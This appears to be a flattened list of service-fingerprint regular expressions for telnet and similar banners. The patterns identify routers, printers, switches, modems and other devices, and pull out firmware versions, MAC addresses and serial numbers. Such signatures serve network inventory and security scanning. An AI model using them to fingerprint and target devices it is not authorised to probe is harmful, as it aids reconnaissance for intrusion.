\*\*\*\*\*\*\*\*\* \*\*\* +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to D-Link Wireless Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0+\r\nServer Model : ([\w._+-]+)\0+\r\nF/W Version : ([\w._-]+)\0.\0+\r\nMAC Address : ([\w ]+) +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\x1b\[H\x1b\[JWelcome at ActiveFax Server\.\r\n\r\n +\xff\xfb\x01\xff\xfb\x03RemoteX Telnet Server V([\d.]+)\n\r\n\rc:\\> +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ZXDSL 831\n\r +\*+\n\r\n\rZTE Corporation, Software Release VIK-([-\w_.]+)\n\r +\*{60}\r\n\r\nThis session allows you to set the TCPIP parameters for your\r\nDell Laser Printer Printer Dell (\w+) MFP Ethernet internal network device, with a hardware\r\naddress of ([0-9A-F:]{17}) \(MSB, Canonical\)\.\r\nIt's an ethernet card\.\r\nNetwork Firmware Version is V([\w._-]+)\(\w+ MFP\) ([\d-]+)\.\r\nSystem Up Time is ([^\r\n.]+)\.\r\n\r\n +\xff\xfb\"\xff\xfb\x03\xff\xfb\x01\xff\xfb\0\xff\xfd\0\n\r\nWelcome to the PDP-10 simulator\r\n\n +\xff\xfb\x01\(Enable\) Password\? +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\r\nCGX3224 Switch Manager Console\. Version: CGX([\d.]+) Bld (\d+),.*\r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[01;00H\r\n\r\0\r\n\r\0[ \t]+\r\n\r\0\r\n\r\0\r\0VersaXpress HPNA Routing Concentrator\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nSportster Pro ([\d.]+) Image Sagem D-BOX2 - Kernel ([-\w_.]+) +\xff\xfb\x01\xff\xfb\x03\r\0\n\*\*\* Lantronix Universal Device Server \*\*\*\r\0\nSerial Number (\d+) MAC address ([\w:]+)\n\r\0Software version 0*([\d.]+) \((\d+)\)\r\0\n\r\0\nPress Enter to go into Setup Mode \r\0\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Fritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nFritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([-\w_+. ]+) Date: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([^\r\n]+)\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03DD-WRT (v\d+)[^\r\n]*\r\nRelease: ([^\r\n]+)\r\n\xff\r\ngateway login: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd\x1f\xff\xfd'\xff\xfd\ +\xff\xfb\x03\xff\xfb\x01\r\n\r\nU\.S\. Robotics\r\nTotal Control \(tm\) NETServer 8/16\r\n\r\nlogin: | p|USRobotics TotalControl NetServer 8/16 telnetd +\xff\xfb\x01\r\n\r\n\*\*\* ADTRAN TSU ESP \*\*\*\r\n\r\n ENTER PASSWORD -> \xff\xfd\x03\xff\xfb\x03 +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix (SCS\d+) Version V([\d/().]+)\n\r\nType HELP +\xff\xfb\x03\xff\xfb\x01\r\n\r\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 1998-2006 Huawei Technologies Co\., Ltd\. All rights reserved\. \*\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X2301 version V\.([-\w_+. ()]+) IPSec from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r *\**\n\r *Welcome to Viking II\. \n\r *\**\n\r\n\rGlobespanVirata Inc\., Software Release VIK-([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[1;1H\x1b\[J\x1b\[22;0H>\x1b\[1K\x1b\[999D\r\0login: +\x1b\[2J\x1b\[1;1fATOS Telnet Server\r\n\r\nCTRL\+d to exit\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03Init Command Line Interface\.\. \r\nBoot Version: [\d.]+\r\nBoot Date: [\d :/]+\r\nATOS Version: ([\d.]+) \([^)]+\)\r\nATOS Date: [\d :/]+\r\nHardware: \w+\r\nProduct Code : \d+\r\nSerial Number : (\d+)\r\nLAN0 MAC Address : ([A-F0-9:]+)\r\nADSL Modem SW version: [\w._-]+ *\r\nADSL Modem API version: \d+\r\nADSL Driver version: [\w._-]+\r\n([\w._-]+) release: ([\w._-]+)+\r\nHW encryption not supported\r\nVinetic fw version : [\w._-]+\r\n\r\nUser name : +\xff\xfb\x01\xff\xfe\x01\n\r\n\r\n\r\n\n\n\n\r\t=+\n\r\t +Samsung SWL-6100AP Configuration\n\r\t +\xff\xfb\x01\xff\xfb\x03\r\0\nMAC address (\w+)\n\r\0Software version ([\w._-]+ \(\d+\)) XPTEXE\r\0\n\n\r\0Press Enter to go into Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03USR ADSL Gateway\r\nLogin: +\xff\xfb\x03\xff\xfb\x01\r\nService Processor login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL2\+ Wireless Router (\w+) \r\nSoftware Version: ([\w.]+)\r\nLogin name: +\xff\xfb\x01Symbol Access Point User/Admin password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\xff\xfe\"\xff\xfc\"Username Access Verification\r\n\r\nLogin : +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to Telnet Server ([\w._-]+)\r\n\x1b\[0m\x1b\[2J\x1b\[05;28H(SM\w+) Managed Switch\x1b\[07;22H\x7fTallahasseeAdmin-Block\x1b\[15;30Husername:\x1b\[17;30Hpassword:\x1b\[15;39H +\r\n\r\nPassword required, but none set\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fWelcome to your TiVo\r\n\r\n=\[tivo:root\]-# +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03AMBIT Cable Modem\r\n\r\nlogin: +refused in\.telnetd from [-\w_.]+ logged\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Access DENIED\.\r\n +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;.*Business Policy Switch 2000 +BeanShell ([-\w_.]+) - by Pat Niemeyer \(pat@pat\.net\)\nbsh % +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\r\n\(Aruba800\) \r\nUser: +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;1H\x1b.*BayStack 420 +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03SHARP (MX-\w+) Ver ([-\w_.]+) TELNET server\. +\xff\xfb\x01\xff\xfb\x03Welcome to (DCS-\w+) telnet daemon\r\n\r\nPassword: +\xff\xfb\x01\r\nVoIP Phone V([-\w_.]+) settings\r\nPassword: +\xff\xfb\x01\r\nAIRAYA login: +\xff.\x01\0?\xff\xfd.*Welcome to ViewStation.*Password: +AD6680 Gateway Software\r\n[-\w_]+ \(MAC ([\w:]+)\)\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch A\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Netgear DM111 ADSL2\+ Modem \r\nSoftware Version: ([-\w_.]+)\r\nLogin name: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0\0\0\0\0\0\r\nServer Model : 2U1P Print Server\0+\r\nF/W Version : ([\w._-]+).*\r\nMAC Address : ([\w ]+) +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\r\n\r\nMMC Technology Telnet\r\nMW-3000AP \w+\( Combo ([-\w_.]+) \)\r\n\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r.*\n\r\n\rSoftware Release R([-\w_.]+)\([^)]+\)\n\rCopyright \(c\) 2001-2003 by D-Link, Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\r\nWelcome to the WhatRoute TELNET Server\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nCNU-550pro login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03picotux login: +\xff\xfb\x03\xff\xfd\x18\xff\xfb\x01\xff\xfd\x1f\xff\xfd!\r\nCadant C3 CMTS\r\n +\r\n\(c\) Copyright 2005, Extron Electronics, IPL T S2, V([\d.]+), +\xff\xfb\x01\xff\xfb\x03\r\n.*HM410dp ADSL2\+ Router\r\n\r\nLogin: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03NS-30G Ver ([-\w_.]+) TELNET server\.\r\0\nCopyright \(c\) \d+ KYOCERA +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X4100 version V\.([-\w_.]+) Rev\. (\d+) \(Patch (\d+)\) from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfe\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfb\x03\xff\xfb\x01\r\nZyXEL Corporation Embedded Telnet Server \(c\) 2000-2003\r\n +\xff\xfb\x01\xff\xfb\x03\*\*\* Lantronix UDS1100 Device Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) \r\0\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 2004-2006 3Com Corp\. and its licensors\. +\xff\xfd\x03\xff\xfb\x01\r\n\r\nProduct type: Avaya (\w+) Media Gateway Release ([\w._-]+)\r\n\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm500 Jade \d+ \(based on ([\w._-]+)\)\r\n\rwelcome on your dreambox! - Kernel ([\w._-]+) \([\d:]+\)\.\r\n\rdm500 login: +\r\nSorry, this system is engaged by a rlogin session\.\r\nHost IP address: ([\d.]+)\.\nLogin name: ([\w._-]+)\.\n +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\n\r\nUser Access Verification\r\n\r\nUsername: +Connected\r\nUse log command to LOGON\r\n +\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) Command Shell\r\nPassword: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) V([\w.]+) Command Shell +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4021\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0SNTP Version ([\d.]+) Server ([\w._-]+)\n\r\0\r\0\nMAC address (\w+)\n\r\0Software version V[\d.]+ \(\d+\) ([\w._-]+)\r\0\nPassword : +uShare \(([\w._-]+)\) \(Built .*\)\nFor a list of registered commands type \"help\"\n\n> +SMPlayer ([\w._-]+)\r\nType help for a list of commands\r\n +Sorry, already connected\.\r\n| p|Slirp PPP/SLIP-on-terminal emulator telnetd +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\r\nCopperJet ([\w._-]+) RouterPlus .*\r\nFirmware version: ([\w._ -]+)\r\nAllied Data Technologies\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x03Welcome to the Windows CE Telnet service on MP370\r\n\r\nPocket CMD v ([\w._-]+)\r\n\\> \n\r\n\\> \\> +\xff\xfb\x01\r\n3Com Access Point 7760 login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 login: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03PRICOM 3100 Ver ([\w._-]+) TELNET server\.\r\0\nCopyright \(C\) 2002-2004 silex technology, Inc\.\r\0\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\r\n\r\r\nWelcome to Aerohive Wireless Product\r\r\n\r\r\nlogin: +\xff\xfb\x01\xff\xfb\x03\r\nLexmark International Telnet\r\n\r\nlogin: +\xff\xfb\x03\xff\xfb\x01Alcatel-Lucent: A7510\r\nA7510_(R\d+) .*\r\n\r\n\r\nLogin: +\xff\xfd\x18\xff\xfd\x1f\xff\xfd!\xff\xfd\x17\xff\xfb\x01\xff\xfb\x03\xff\xfd \xff\xfd#\r\n\r\n Welcome to OpenVMS \(TM\) VAX Operating System, Version V([\w._-]+) \r\n\r\n\r\0Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n>>> System ([\w._-]+) - OpenVMS Alpha V([\w._-]+) <<<\r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nGbE2c L2/L3 Ethernet Blade Switch for HP c-Class BladeSystem\.\r\n\r\nCopyright\(C\)2003 Hewlett-Packard Development Company, L\.P\.\r\n\r\n\r\nEnter tacacs username: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03U\.S\. Robotics ADSL 4-Port Router\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0\*\*\* Mitsubishi ProjectorView Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) MELCO\r\0\n\n\r\0Press Enter for Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n === IMPORTANT ============================\r\n Use 'passwd' to set your login password\r\n this will disable telnet and enable SSH\r\n ------------------------------------------\r\n\r\n\r\nBusyBox v(.*) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n ___ ___ ___ \r\n\( _`\\ _ /'___\)'___\) Bifferboard mini-distribution v([\w._-]+)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 =======================\r\n DSL-500B \r\n =======================\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWelcome to Linux \(ZEM500\) for MIPS\r\n\rKernel ([\w._-]+) \w+ on an MIPS\r\n\rZEM500 login: +\xff\xfb\x01\xff\xfe\x01Connected\r\n\n\rAironet BR500E V([\w._-]+) Main Menu +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TrioLink \(ADSL IAD\)\r\nLogin: +Linux ([\w._-]+) \[INSTALL: [\d-]+\]\nLASTPATCH: [\d:-]+\n +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\x1b\[0;37;40m\x1b\[2J\x1b\[1;1HLogin Name: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Xcelerator IP \r\nLogin: +odec=\d+ u=\d+, p=\d+, i=\d+, max entries = \d+ \r\n\d+: IMGREQUEST: request_stats, image buffers available = \d+ \r\n\d+: MAIN: (\d+) images\(J=\d+, P=\d+, I=\d+\) stored on disk in last minute +\r\nSiemens 5940 T1E1 \[COMBO\] Router \([\w._-]+\) v([\w._-]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to Dinion-IP-NWC [\d.]+ from [\d.]+\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfe\x01\xff\xfd\0\r\nser2net port \d+ device (/dev/[-\w_]+) \[\d+ \w+\] \(Debian GNU/Linux\)\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rTerminal shell v1\.0\n\r\rCopyright \xa92008 Motorola, Inc\. All rights reserved\.\n\r\rNetopia Model ([\d-]+)(?: AnnexA)? High-Power Wireless DSL Ethernet Managed Switch\n\rRunning Netopia SOC OS version ([\w.-]+ \(build \w+\))\n +\xff\xfb\x01\xff\xfb\x03ssss ssss sss s ss sss sss sss sssss \r\n s s s s s s s s s s s s s \r\n s s s s s s s s s s s \r\n s s ss s ss ssss s sss s ssss s s sss \r\n s s s s s s s s s s s s s s s \r\n s s s s s s s sss s s s s s s \r\n s s s s s s s s s s s s s s s s s \r\nssss ssss ssssss sss sss sssss ss sssss sss sss sssss\r\nLogin: +\r\nPRO2 Control Console\r\n +\w{12}\r\nETHMAC ([0-9a-f:]+)\r\nWIFIMAC ([0-9a-f:]+)\r\n> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWireless AP Manager Console [^\r\n]+\r\n please enter your password: +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05Login: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nYou are connected to configuration tool\r\nEnter the password: +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05\r\n\*\*\* Welcome to VTM \*\*\*\r\n\r\n\r\n\rLogin : +\r\nCEN-IDOC Control Console\r\n\r\nCEN-IDOC> +\xff\xfb\x01\r\nWelcome to Ring v([\d.]+) Copyright \(C\) AMX Corp\. 2002-2003\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TESTING MODEL ADSL Router\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\[([^]]*)\]\[([^]]*)\]\[([^]]*)\]\r\n +\xff\xfe\"\xff\xfb\x01\x1b<\x1b>\x1b\[\?25l\x1b\[0m\x1b\[2J\x1b\(B\x1b\)0\x0f\x1b\[7m\x1b\[f Areca Technology Corporation RAID Controller +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n\r\n\*{76}\r\n\r\n +Minolta Network Configuration Utility\r\n +Minolta\r\n +Version ([\w.]+)\r\n +\xff\xfd\x03\xff\xfe\x01\xff\xfb\x01\s+ZebraNet Internal Wired PS Configuration Utility\r\n\r\n Type your password\. Press Enter when finished\.\r\n\r\n Password: +\xff\xfb\x01\n\rWelcome to TrueTime Network Interface\n\r\rUser name: +MythFrontend Network Control\r\nType 'help' for usage information\r\n---------------------------------\r\n# +\x1b\[0m\r\nWelcome to (IC-\d+)!\r\n\r\n\x1b7\x1b\[\?25l\x1b\[501;501H\x1b\[6n\x1b8\x1b\[\?25h\r\x1b\[0m\x1b\[1mIC-\d+ # \x1b\[0m\x1b\[J\r\x1b\[10C +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x0c\x1b\[2JEnter Password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\r\n\rWelcome to DreamBox\.\r\n\rRunning under Kernel ([\w._-]+) \.\r\n\rBased on (Gemini [\w._-]+ GUI)\.\r\n\rKernel and utilities compiled by SatDream\.\r\n\r\r\n\r\r\n\rhttp://www\.satderam\.ru , info@satdream\.ru , dreambox@satdream\.ru\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nBNT Layer 2/3 Copper Gigabit Ethernet Switch Module for IBM BladeCenter\.\r\n\r\n\r\nEnter password: | p|Nortel Layer 2/3 Gigabit Ethernet switch for IBM BladeCenter +\xff\xfb\x01\xff\xfd\"\r\n##### #### ## ## #### #####\r\n## ## ## ## ## # ## ## ## ##\r\n## ## ###### ####### ## #####\r\n## ## ## ####### ## ## ##\r\n## ## ##### ## ## #### ######\r\n A Butter Team Creation\r\n\r\nPassword : +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfe\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05TiMOS-([\w._-]+) cpm/hops ALCATEL SR (\w+) +\xff\xfb\x01\xff\xfb\x03\r\n\x1b\[1;1H\x1b\[2J\r\n\r\nObeh\xf6riga \xe4ga ej tilltr\xe4de\r\n\r\n\xf6vertr\xe4delse beivras\.\r\n\r\n\rUsername: +\n\rTA-005-FXO1-122M : CLI\n\rLogin : +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista/2008 Ver\. ([\w._-]+)\n\rEvaluation copy, \d+ users enabled\. Expiration date is ([\d/]+)\.\n\r\n\rUser \d+ of \d+\n\r\n\rlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\+{79}\r\n\r\+{33}#############\+{33}\r\n\r\+{28}###### ######\+{28}\r\n\r +\xff\xfb\x01\xff\xfb\x03BR-telnet@(FES\w+) Router> +\xff\xfb\x01\xff\xfb\x03\r\n\r\nCopyright \(c\) 2005 - 2008 Enterasys, Inc\. All rights reserved\.\r\n\n\r\n\r\n\r\0Username: +\r={74}\n\rTransition Networks Telnet Server\n\rSystem name: SMKG-PKGEAST-([\w._-]+)\n\rPress CTRL-D to disconnect\.\n\rEnter password: +\xff\xfb\x03\xff\xfb\x01\r\n \*{73}\r\n This is a private system\. \r\n Do not attempt to login unless you are an authorized user\. \r\n Any authorized or unauthorized access or use may be monitored and can\r\n result in criminal or civil prosecution under applicable law\.\r\n \*{73}\r\n\r\nMP login: +\xff\xfe\"\xff\xfb\x01\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[5B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[6B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[7B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[2B Verify Password \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[4B \x0e\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[8C\x1b\[9B\x1b\[1Blqqqqqqqqqqqqqqqqqqqk\x1b +Sorry, new remote sessions are disallowed by current switch configuration\. +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\x1b\[H\x1b\[J\r\nWireless Router Manager Console , Version : ([\w._-]+)\r\nPlease enter your password : +\xff\xfb\x01\xff\xfb\x03\*{60}\r\n\* WARNING ALERT: AUTHORIZED USERS ONLY! +\*\r\n\* +\*\r\n\* All activities conducted on this system may be monitored \*\r\n\* and recorded\. If you are not an authorized user, log off \*\r\n\* immediately\. Illegal entry, misuse, and / or criminal \*\r\n\* activity will be documented and prosecuted to the full \*\r\n\* extend of the law\. +\*\r\n\*{60}\r\n\r\n\r\nPress to accept and continue the login process\.\.\.\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\x1b\[2J\x1b\[1;1H\x1b\[1mwb-adtran-\w+ ADTRAN (TDU-\w+)\x1b\[0m\x1b\[2;1HConnecting\.\.\.\. +\r\n%connection closed by remote host!\0 +Sorry, telnet is not allowed on this port! +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nBUFFALO INC\. LinkStation series HS-DHGL\(JINMU\)\r\n\rFENCHURCH login: +\nFelix Remote Shell Console:\r\n============================\r\n\r\n-> +\r\n\r\nBackup Server Telnet Session\r\n\r\nUser: +\xff\xfb\x01\xff\xfd\"\[game001\] remote control session\.\r\nPassword:\0 +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve J\w+ Switch ([\w-]+)\r\n\rSoftware revision ([\w._-]+)\r\n +\xff\xfb\x01\r\nNetDVRDVS: +nodnsquery/[\d.]+ is not authorized to use the telnet proxy\r\n +\xff\xfc\x01\xff\xfd\"ixProxy V([\d.]+), Copyright \(C\) \d+ Ixia Communications\r\nEnter target port ip address as login name \(example: 10\.0\.1\.1\)\r\nlogin: +\0\0\0H\0\0\0\x02\x0fTimeEdit131\. +0301&<\x16\0\x84\xc7\x02\xe0\xe1\xb1\x008\x13\x1e\x0b\x80<\x16\0\xc7\t\x8f\x05\xc0\xf0X\0\x1c\xc2c\x01p\x1e\x0b\x80\xe3c\x01p\xdcX\0\x1c7\x8f\x05\xc0q\x0b\x80\xe3F\xc7\x02\xe0\xb8,\0\x8e\x1b\xb1\x008n\x05\xc0q\xa3\x008n\xb4\x02\xe0\xb8\xd1\x01p\xdch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\x03\0\x04\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\r\0\x03\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9a\x20\xd0Z\x1e\x1b\xa3\*\xf2\xdd\xe2\(\xc3sp&\xda\xe4Yp\xdbET\xf9\x8cc\xc24\*Y\xbe\xb3\xba\xd6%\xf5\xb668\xad\xab>@D<\x01\xdd>\)\xdb\x18\xf55\xd1\xba\x96\x1c\x17\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x01 +\x0f\0\n\0\x01\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x0b\0\0\0GBXRemote 2 +VTUN server ver \. (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +VTUN server ver \(.*\) (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +250 OK moleSoftware VHCS2 Server Welcomes You !\r\n +TrueWeather\r\n\r\n> +\x96\xfeS\xab +\+ read portFile\n\+ head -1\n\+ find /var/websm/ +([-\w_.]+) xine-ui ([\d.]+) remote server\. Nice to meet you\.\n +Vty password is not set\.\r\n +\r\nUser Access Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword: +bp[-\w]+: error while loading shared libraries: libstdc\+\+-libc6\.2-2\.so\.3: cannot open shared object file: No such file or directory\n +\0\x0e@........\0\0\0\0\0 +\0\*@.*\0\0\0\0\0 +\0<\xaa\xc5\r\^\xf7\x1b\xd1\xe1a/\xe8\x17P\x9dOb\xbb\x93\x87\xe0\xf3v\x81K\xa4!\xe6\xc7\x01\x977u5A\xd1M\x1b;\xc7\xcb\x87\xb5\x87\xf3~\xc8w\xef\xd3\x87eA\0\^\xbf\xc5\x93i\xf6\x87 +\xa5A\0\x01\0\0\0,\0\0\0\x02\0\0\0L\0\0\0\x08Connect\0\0\0\0x\0\0\0\x0857222\0\0\0 +.\x01.[\x02\x03]\x01\d+\0 +OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n +SuSE Meta pppd \(smpppd\), Version ([\d.]+)\r\n +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } 